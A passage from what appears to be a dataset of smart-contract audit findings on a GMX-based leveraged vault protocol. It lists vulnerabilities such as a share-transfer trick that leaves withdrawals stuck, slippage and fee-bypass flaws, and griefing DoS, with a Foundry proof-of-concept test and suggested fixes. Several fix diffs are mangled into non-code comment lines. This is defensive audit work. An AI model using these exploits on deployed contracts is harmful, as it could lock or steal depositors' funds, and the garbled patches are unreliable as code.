Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log(\"debtAmtTokenBBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"debtAmtTokenBAfter: %s\", debtAmtTokenBAfter);\\n }\\n}\\n```\\n -User can revert processWithdrawчhighчWhen a user wants to withdraw his tokens after depositing, the LP tokens are first sent to GMX. GMX then sends back the deposited tokens. Before the user receives them, their Vault Shares are burned in processWithdraw:\\n```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nA user could, after the LP tokens have been transferred to GMX and the Vault is waiting for the callback, transfer his Vault Shares away from his address. This would result in not having enough tokens left during the burn, causing a revert. Afterward, the Vault would be stuck in the 'Withdraw' state because, although the keeper could call the function again, it would result in revert again.\\nHere is a POC that demonstrates how a user can cause the processWithdraw to revert:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { IERC20Errors } from \"@openzeppelin/contracts/interfaces/draft-IERC6093.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\nimport { Attacker } from \"./Attacker.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC4() public {\\n //owner deposits\\n vm.startPrank(address(owner));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //user1 deposits\\n vm.startPrank(address(user1));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n \\n uint256 vaultSharesAmt = IERC20(address(vault)).balanceOf(address(user1)); //Vault Shares from user1 to withdraw\\n vm.startPrank(address(user1));\\n _createWithdrawal(address(USDC), vaultSharesAmt, 0, SLIPPAGE, EXECUTION_FEE); //User 1 creates a withdrawal\\n IERC20(address(vault)).transfer(address(user2), vaultSharesAmt); //Before processWithdraw is executed and the user's Vault Shares are burned, he sends them away\\n\\n vm.expectRevert(\\n abi.encodeWithSelector(IERC20Errors.ERC20InsufficientBalance.selector, address(user1), 0, vaultSharesAmt)\\n );\\n mockExchangeRouter.executeWithdrawal(address(WETH), address(USDC), address(vault), address(callback)); //executeWithdraw reverted as there are no tokens to burn\\n vm.stopPrank();\\n\\n GMXTypes.Store memory _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw)); //shows that the vault is still in the Withdraw status\\n }\\n}\\n```\\n\\nThe POC can be started with this command: `forge test --match-test test_POC4 -vv`чTokens should be burned immediately after remove liquidity is called in GMXWithdraw.sol:\\n```\\n// Add the line below\\n 154: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n// Remove the line below\\n 197: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\nчA user could put the Vault into a 'Stuck' state that can only be exited through 'emergencyPause' and 'emergencyResume.' This would take some time as 'emergencyResume' can only be called by the owner, who is a Multisig with a Timelock. (A keeper could also call 'processWithdrawCancellation,' but in this case, the debt to the lending vault would not be repaid. The tokens withdrawn by GMX would simply remain in the vault, and the user's Vault Shares would not be burned.)ч```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n -Incorrect slippage protection on depositsчhighчThe slippage on deposits is enforced by the `minMarketTokenAmt` parameter. But in the calculation of `minMarketTokenAmt`, the slippage is factored on the user's deposit value and not the leveraged amount which is actually being deposited to GMX.\\n```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXDeposit.sol#L54-L146\\nBut vaults with leverage greater than 1 will be adding more than `_dc.depositValue` worth of liquidity in which case the calculated `minMarketTokenAmt` will result in a much higher slippage.\\nExample Scenario\\nThe vault is a 3x leveraged vault\\nUser deposits 1 usd worth tokenA and sets slippage to 1%.\\nThe `minMarketTokenAmt` calculated is worth 0.99 usd\\nThe actual deposit added is worth 3 usd due to leverage\\nThe deposit receives 2.90 worth of LP token which is more than 1% slippageчUse the actual deposit value instead of the user's initial deposit value when calculating the `minMarketTokenAmt`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXDeposit.sol b/contracts/strategy/gmx/GMXDeposit.sol\\nindex 1b28c3b..aeba68b 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXDeposit.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXDeposit.sol\\n@@ // Remove the line below\\n135,7 // Add the line below\\n135,15 @@ library GMXDeposit {\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n// Remove the line below\\n _dc.depositValue,\\n// Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenA),\\n// Add the line below\\n _alp.tokenAAmt\\n// Add the line below\\n ) // Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenB),\\n// Add the line below\\n _alp.tokenBAmt\\n// Add the line below\\n ),\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n```\\nчDepositors can loose valueч```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n -incorrect handling for deposit failure leads to stuck at `deposit_failed` status .чmediumчWhen a deposit fails, the contract can become stuck in a `deposit_failed` status due to improper handling of debt repayment by swapping through the `swapTokensForExactTokens()` function.which leads to gas losses for keeper attempting to handle that and puts user deposits at risk.\\nIn case of a user making a deposit to the `strategy`, it will create a deposit in `GMX`. After a successful deposit, `GMX` will call the callback function `afterDepositExecution`, and the callback function will call `processDeposit`.\\nIf the `processDeposit()` fails in the `try` call for any reason, the function will `catch` that and set the status to `deposit_failed`. An event will be emitted so the keeper can handle it.\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n\\nThe keeper calls the function processDepositFailure(). This function initiates a `requestWithdraw` to `GMX` to remove the liquidity added by the user deposit (+ the borrowed amount).\\nAfter executing the `removeLiquidity`, the callback function `afterWithdrawalExecution` is triggered. and since the status is `deposit_failed`, it invokes the function `processDepositFailureLiquidityWithdrawal`.\\nIn `processDepositFailureLiquidityWithdrawal`, it first checks if a swap is necessary. If required, it swaps tokens to repay the debt.\\n```\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = block.timestamp;\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n```\\n\\nThe problem arises if the swap revert if the `tokenIn` balance is insufficient to cover the `_amountOut` of `_tokenOut`, leading to a failed swap since the swap function is `swapTokensForExactTokens`. Consequently, the status remains `deposit_failed` and the callback revet.\\nNote: The swap can fail for various reasons.\\nIn this scenario, the keeper can only invoke the `processDepositFailure()` function again. During the second call, it directly triggers `processDepositFailureLiquidityWithdrawal` since the `lp` tokens for the failed deposit has already been withdrawn.\\n```\\n function processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current gmx LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n //// rest of code more code\\n }}\\n```\\n\\nThe swap will always revert because the contract's balance of `tokenIn` will never be sufficient to cover the `_amountOut` of `_tokenOut`. Consequently, the status remains stuck at `deposit_failed`.чUtilize `swapExactTokensForTokens` and swap the remaining tokens from `tokenIn` after substracting debt need to be repaid of this token.for `tokenOut`.\\nImplement safeguards to calculate the appropriate amount for swapping, avoiding potential reverting transactions. Here's an example of how to calculate the swap amount:\\n` if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n if(rp.repayTokenBAmt < self.tokenB.balanceOf(address(this))){\\n _tokenToAmt = self.tokenB.balanceOf(address(this)) - rp.repayTokenBAmt;\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n }\\n }`чThe strategy remains stuck at the `deposit_failed` status, halting any further interactions with the protocol.\\nKeepers lose gas for each call to `processDepositFailure()`.\\nUsers may lose their deposits.ч```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n -Missing fees allow cheap griefing attacks that lead to DoSчmediumчThe protocol has chosen a design pattern which does not allow two users at the same time to interact with the system as every time a user deposits or withdraws funds a 2-step process begins which interacts with GMX and only after this process is closed, another user is allowed to start a new process. This design pattern can be abused as griefing attack by front running all user calls with a small deposit, or withdraw call, to DoS the user's call. As the protocol is deployed on L2 blockchains with low transaction fees and does not take fees on depositing or withdrawing funds, this DoS griefing attack is cheap and can be scaled to a point where nobody is able to interact with the system.\\nThe design pattern of the system which leads to this possibility is the status variable.\\nThe flow for such a griefing attack would look like the following:\\nThe system's status is Open\\nUser wants to deposit or withdraw and creates a transaction to do so\\nAttacker front runs the call of the user and deposit or withdraw a small amount of funds (Systems status changes to Deposit or Withdraw)\\nUser's call gets reverted as the check if the system's status is Open reverts\\nDeposit function calls beforeDepositChecks and updates the status to Deposit:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n\\nThe beforeDepositChecks function reverts if the current status is not Open:\\n```\\nfunction beforeDepositChecks(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n) external view {\\n if (self.status != GMXTypes.Status.Open)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nThe same pattern is implemented in the withdraw flow.чImplement fees, for depositing and withdrawing, to increase the costs of such a griefing attack, or rethink the status architecture.чDoS of the whole system for all depositors.ч```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n -Yield in trove is lost when closing a strategy vaultчhighчThe funds in the trove contract are not claimed during the emergency close flow and can not be claimed in a normal way during this situation, because of a status change. Therefore, all the acquired yield will be lost.\\nWhen users deposit, or withdraw tokens, all acquired yield from GMX is sent to the trove contract:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\n```\\nfunction withdraw(\\n GMXTypes.Store storage self,\\n GMXTypes.WithdrawParams memory wp\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of withdrawers assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\nThe only way in the system to claim these yield is the compound function, which calls the beforeCompoundChecks function:\\n```\\nfunction compound(\\n GMXTypes.Store storage self,\\n GMXTypes.CompoundParams memory cp\\n) external {\\n // Transfer any tokenA/B from trove to vault\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenB.balanceOf(address(self.trove))\\n );\\n }\\n // rest of code\\n GMXChecks.beforeCompoundChecks(self);\\n // rest of code\\n}\\n```\\n\\nThis function reverts if the current status of the system is not Open or Compound_Failed:\\n```\\nfunction beforeCompoundChecks(\\n GMXTypes.Store storage self\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Compound_Failed\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nAs the emergency close flow updates this status to Paused and later to Closed, calling compound will revert:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\n```\\nfunction emergencyClose(\\n GMXTypes.Store storage self,\\n uint256 deadline\\n) external {\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n ) = GMXManager.calcRepay(self, 1e18);\\n\\n (\\n bool _swapNeeded,\\n address _tokenFrom,\\n address _tokenTo,\\n uint256 _tokenToAmt\\n ) = GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n\\n GMXManager.repay(\\n self,\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n}\\n```\\n\\nAnd as we can see during these process the funds inside the trove contract are never claimed and as the strategy vault is the only address that can claim the funds of the trove, all funds are gone.\\n```\\ncontract GMXTrove {\\n\\n /* ==================== STATE VARIABLES ==================== */\\n\\n // Address of the vault this trove handler is for\\n IGMXVault public vault;\\n\\n /* ====================== CONSTRUCTOR ====================== */\\n\\n /**\\n * @notice Initialize trove contract with associated vault address\\n * @param _vault Address of vault\\n */\\n constructor (address _vault) {\\n vault = IGMXVault(_vault);\\n\\n GMXTypes.Store memory _store = vault.store();\\n\\n // Set token approvals for this trove's vault contract\\n _store.tokenA.approve(address(vault), type(uint256).max);\\n _store.tokenB.approve(address(vault), type(uint256).max);\\n }\\n}\\n```\\nчTransfer the funds inside the trove into the vault during the emergency close process.чIf a strategy vault is closed, all funds in the trove are lost.ч```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n -emergencyResume does not handle the afterDepositCancellation case correctlyчmediumчThe `emergencyResume` function is intended to recover the vault's liquidity following an `emergencyPause`. It operates under the assumption of a successful deposit call. However, if the deposit call is cancelled by GMX, the `emergencyResume` function does not account for this scenario, potentially locking funds.\\nWhen `emergencyResume` is invoked, it sets the vault's status to \"Resume\" and deposits all LP tokens back into the pool. The function is designed to execute when the vault status is \"Paused\" and can be triggered by an approved keeper.\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nShould the deposit fail, the callback contract's `afterDepositCancellation` is expected to revert, which does not impact the continuation of the GMX execution. After the cancellation occurs, the vault status is \"Resume\", and the liquidity is not re-added to the pool.\\n```\\nfunction afterDepositCancellation(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (_store.status == GMXTypes.Status.Deposit) {\\n if (_store.depositCache.depositKey == depositKey)\\n vault.processDepositCancellation();\\n } else if (_store.status == GMXTypes.Status.Rebalance_Add) {\\n if (_store.rebalanceCache.depositKey == depositKey)\\n vault.processRebalanceAddCancellation();\\n } else if (_store.status == GMXTypes.Status.Compound) {\\n if (_store.compoundCache.depositKey == depositKey)\\n vault.processCompoundCancellation();\\n } else {\\n revert Errors.DepositCancellationCallback();\\n }\\n }\\n```\\n\\nGiven this, another attempt to execute `emergencyResume` will fail because the vault status is not \"Paused\".\\n```\\nfunction beforeEmergencyResumeChecks (\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Paused)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n\\nIn this state, an attempt to revert to \"Paused\" status via `emergencyPause` could fail in GMXManager.removeLiquidity, as there are no tokens to send back to the GMX pool, leading to a potential fund lock within the contract.чTo address this issue, handle the afterDepositCancellation case correctly by allowing emergencyResume to be called again.чThe current implementation may result in funds being irretrievably locked within the contract.ч```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n -A depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.чmediumчThe fee-minted in the form of shares (svTokens) would not be subtracted from the amount of shares (svTokens) to be minted to the GMXVault's depositor.\\nDue to that, a depositor of the GMXVault could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.\\nWithin the GMXDeposit#deposit(), the GMXVault#mintFee() would be called to mint the fee in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L119\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXVault#mintFee(), the amount (GMXReader.pendingFee(_store)) of the shares would be minted to the treasury (_store.treasury) in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXVault.sol#L335\\n```\\n /**\\n * @notice Mint vault token shares as management fees to protocol treasury\\n */\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store)); ///<------------ @audit\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhen callback of deposit, the the GMXDeposit#processDeposit() would be called via the GMXVault#deposit().\\nWithin the GMXDeposit#processDeposit(), the amount (self.depositCache.sharesToUser) of shares (VaultTokens) would be minted to the GMXVault's depositor (self.depositCache.user) like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L172\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n */\\n function processDeposit(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeProcessDepositChecks(self);\\n\\n // We transfer the core logic of this function to GMXProcessDeposit.processDeposit()\\n // to allow try/catch here to catch for any issues or any checks in afterDepositChecks() failing.\\n // If there are any issues, a DepositFailed event will be emitted and processDepositFailure()\\n // should be triggered to refund assets accordingly and reset the vault status to Open again.\\n try GMXProcessDeposit.processDeposit(self) {\\n // Mint shares to depositor\\n self.vault.mint(self.depositCache.user, self.depositCache.sharesToUser); ///<------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXDeposit#processDeposit() above, the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() is supposed to be subtracted from the amount of the shares to be minted to the GMXVault's depositor via the GMXDeposit#processDeposit().\\nHowever, there is no logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().чWithin the GMXDeposit#processDeposit(), consider adding a logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().чThe depositor could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.ч```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n -Incorrect depositable shortToken amount calculation in Delta neutral vaultsчmediumчWhen calculating the maximum possible depositable amount for delta neutral vaults, `_maxTokenBLending` is calculated incorrectly.\\n```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXReader.sol#L254-L270\\nIf `a` user wants to deposit `v` value to `a` `l` leveraged delta neutral vault with token weights `a` and `b`, the calculation of required lending amount would be as follows:\\n```\\nTotal value to deposit to GMX = lv\\nValue of tokens to short = lva\\nHence this value will be borrowed from the tokenA lending vault\\nRemaining value to borrow (from tokenB lending vault) = lv - lva - v (deposit value provided by user)\\nHence if there is Tb value of tokens in tokenB lending vault, v <= Tb / (l - la - 1)\\n```\\nчChange the formula to the correct one.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXReader.sol b/contracts/strategy/gmx/GMXReader.sol\\nindex 73bb111..ae819c4 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXReader.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXReader.sol\\n@@ // Remove the line below\\n266,8 // Add the line below\\n266,7 @@ library GMXReader {\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n// Remove the line below\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n// Remove the line below\\n // Remove the line below\\n 1e18;\\n// Add the line below\\n / (self.leverage // Remove the line below\\n (self.leverage *_tokenAWeight / SAFE_MULTIPLIER) // Remove the line below\\n 1e18);\\n \\n _additionalCapacity = _maxTokenALending > _maxTokenBLending ? _maxTokenBLending : _maxTokenALending;\\n }\\n```\\nчDeposit attempts can revert even when there is enough tokens to lend causing inefficiency, loss of gas for depositors and deviation from the protocol specification.ч```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 